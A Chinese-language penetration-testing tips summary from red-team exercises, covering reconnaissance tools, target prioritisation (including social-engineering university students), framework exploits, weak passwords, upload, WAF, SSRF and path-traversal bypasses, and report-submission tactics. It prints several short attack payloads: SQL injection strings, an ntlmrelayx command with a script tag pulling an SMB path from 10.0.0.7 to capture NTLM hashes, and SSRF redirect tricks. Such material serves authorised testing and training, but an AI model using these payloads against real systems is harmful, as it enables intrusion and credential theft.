HW渗透测试实战技巧与经验总结<\/h1>

一、信息收集方法论<\/h2>

1.1 资源扩展技巧<\/h3>

单位名称利用<\/strong>：在FOFA等平台搜索 title="单位名称"<\/code><\/li>

域名扩展<\/strong>：推荐工具：挖掘机<\/li> subDomainsBrute.py<\/li> <\/ul> <\/li> IP处理<\/strong>：外网扫描：masscan<\/li> 内网扫描：nbtscan<\/li> <\/ul> <\/li> <\/ul> 1.2 目标分析工具<\/h3> Wappalyzer<\/strong>：识别网站框架技术栈<\/li> Shodan<\/strong>：端口探测与漏洞发现<\/li> 敏感文件探测<\/strong>： phpinfo.php<\/li> robots.txt<\/li> 在线检测平台：https:\/\/scan.top15.cn\/web\/infoleak<\/li> <\/ul> <\/li> <\/ul> 1.3 高级收集技巧<\/h3> 测试域传输漏洞<\/li> 后台手动探测路径：\/admin<\/code>, \/login<\/code>, \/manager<\/code>，或根据公司名称推测<\/li> 特殊文件利用： .git文件：可恢复源代码<\/li> .DS_Store：可用Python EXP利用<\/li> .svn文件<\/li> .swp文件：使用vim -r<\/code>恢复<\/li> <\/ul> <\/li> <\/ul> 二、目标选择策略<\/h2> 2.1 目标优先级排序<\/h3> 高校系统<\/strong>：<\/p> 资源丰富（OA、教务、广播、新闻系统）<\/li> 防御相对薄弱<\/li> 社工容易（通过QQ群获取学号等信息）<\/li> <\/ul> <\/li> 中等优先级<\/strong>：<\/p> 化工\/交通\/能源行业<\/li> 论坛系统<\/li> 各类企业系统<\/li> <\/ul> <\/li> 低优先级<\/strong>：<\/p> 医院系统（HIS系统风险高）<\/li> 银行系统<\/li> 电信运营商系统<\/li> <\/ul> <\/li> <\/ol> 三、攻击路径与得分技巧<\/h2> 3.1 高效得分方法<\/h3> 框架漏洞利用<\/strong>：<\/p> ThinkPHP、Joomla等已知EXP<\/li> Java框架特别关注： Struts2<\/li> JBoss反序列化<\/li> Shiro反序列化<\/li> <\/ul> <\/li> <\/ul> <\/li> 弱口令攻击<\/strong>：<\/p> 常用组合：admin\/admin, admin\/123456等<\/li> 特殊技巧：注册账号时使用admin[多个空格]<\/code>可能绕过验证<\/li> <\/ul> <\/li> 文件上传绕过<\/strong>：<\/p> 黑名单绕过：修改后缀为csproj后包含<\/li> 使用phtml等假后缀<\/li> <\/ul> <\/li> 白名单绕过：利用环境变量（如将dll改为php后转换）<\/li> 修改Content-Type为application\/vnd.php.serialized<\/code><\/li> <\/ul> <\/li> <\/ul> <\/li> 未授权访问<\/strong>：<\/p> Redis<\/li> MongoDB<\/li> 各类内网系统<\/li> <\/ul> <\/li> SQL注入高级技巧<\/strong>：<\/p> 使用?x=1-if(user() like 'x%25',0,1)<\/code>等Payload<\/li> GET改POST注入<\/li> 添加X-Forward: 127.0.0.1可能绕过过滤<\/li> 构造白名单词汇绕过WAF<\/li> 垃圾数据注入（POST型放参数后，GET型转POST）<\/li> <\/ul> <\/li> <\/ol> 3.2 其他漏洞利用<\/h3> XSS钓鱼<\/strong>：需要时间但有效<\/li> XXE\/SSRF\/CSRF<\/strong>：遇到即利用<\/li> SWF文件<\/strong>：可构造XSS Payload<\/li> NTLM中继<\/strong>：利用XSS获取NTLM python ntlmrelayx.<\/span>py -<\/span>tf targets.<\/span>txt -<\/span>c hostname ><\/span> ~\/<\/span>smbrelay.<\/span>txt <\/span><\/span><<\/span>script src=<\/span>"<\/span>\\\\<\/span>10.0.0.7<\/span>\\<\/span>smbrelay"<\/span>><\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> 四、HW实战技巧<\/h2> 4.1 报告提交策略<\/h3> 资源共享时<\/strong>：<\/p> 发现漏洞先提交空报告占位<\/li> 后续补充完整内容<\/li> 防止他人抢先提交相同漏洞<\/li> <\/ul> <\/li> 资源未共享时<\/strong>：<\/p> 提交完整渗透链报告<\/li> 从外网打点到内网横向移动<\/li> <\/ul> <\/li> <\/ol> 4.2 特殊绕过技巧<\/h3> 路径绕过<\/strong>：<\/p> \/urltest\/.\/info\/secret.jsp<\/code><\/li> \/urltest\/;xinxin\/info\/secret.jsp<\/code><\/li> \/urltest\/xinxin\/..\/info\/secret.jsp<\/code><\/li> <\/ul> <\/li> SSRF绕过<\/strong>：<\/p> IP转八进制（可加0-3个前导0）<\/li> 去掉https:\/\/<\/code>的\/\/<\/code><\/li> 重定向技巧： <a<\/span> href<\/span>=<\/span>"https:\/\/www.baidu.com@127.0.0.1"<\/span>> <\/span><\/span><\/code><\/pre>（@可替换为#或?）<\/li> <\/ul> <\/li> Cookie\/Session操作<\/strong>：<\/p> 修改参数可能实现任意用户浏览<\/li> 同源策略下设置document.cookie<\/code>共享<\/li> <\/ul> <\/li> 命令执行探测<\/strong>：<\/p> 测试command=cat+\/etc\/version<\/code><\/li> 观察URL中action=<\/code>等参数，尝试路径遍历<\/li> <\/ul> <\/li> <\/ol> 五、工具推荐清单<\/h2> 信息收集<\/strong>：<\/p> FOFA\/Shodan<\/li> 挖掘机\/subDomainsBrute.py<\/li> masscan\/nbtscan<\/li> <\/ul> <\/li> 目录扫描<\/strong>：<\/p> dirsearch.py<\/li> 御剑<\/li> <\/ul> <\/li> 后台发现<\/strong>：<\/p> test404轻量级后台扫描器<\/li> <\/ul> <\/li> 被动扫描<\/strong>：<\/p> xray（曾发现3个注入）<\/li> <\/ul> <\/li> 浏览器插件<\/strong>：<\/p> Wappalyzer<\/li> Shodan<\/li> <\/ul> <\/li> <\/ol> 六、防御规避经验<\/h2> WAF绕过<\/strong>：<\/p> 改变请求方式（GET转POST）<\/li> 添加垃圾数据<\/li> 使用白名单词汇<\/li> 修改HTTP头（如X-Forward）<\/li> <\/ul> <\/li> 权限提升<\/strong>：<\/p> 后台修改密码时替换refer和管理员账号<\/li> 利用逻辑漏洞提升权限<\/li> <\/ul> <\/li> 静态防御绕过<\/strong>：<\/p> 对于静态登录页面，利用同源策略设置cookie<\/li> 尝试添加端口号（如:80）绕过访问限制<\/li> <\/ul> <\/li> <\/ol> 七、实战注意事项<\/h2> 目标确认<\/strong>：<\/p> 避免"打偏"（攻击错误目标）<\/li> 多次验证目标归属<\/li> <\/ul> <\/li> 时间管理<\/strong>：<\/p> 优先处理易得分的漏洞<\/li> 合理分配时间给不同目标<\/li> <\/ul> <\/li> 团队协作<\/strong>：<\/p> 及时共享有效Payload<\/li> 分工明确（信息收集、漏洞验证、报告撰写）<\/li> <\/ul> <\/li> <\/ol> 本总结基于2020年HW实战经验，部分技术可能需要根据当前环境调整。请务必在合法授权范围内使用这些技术。<\/p>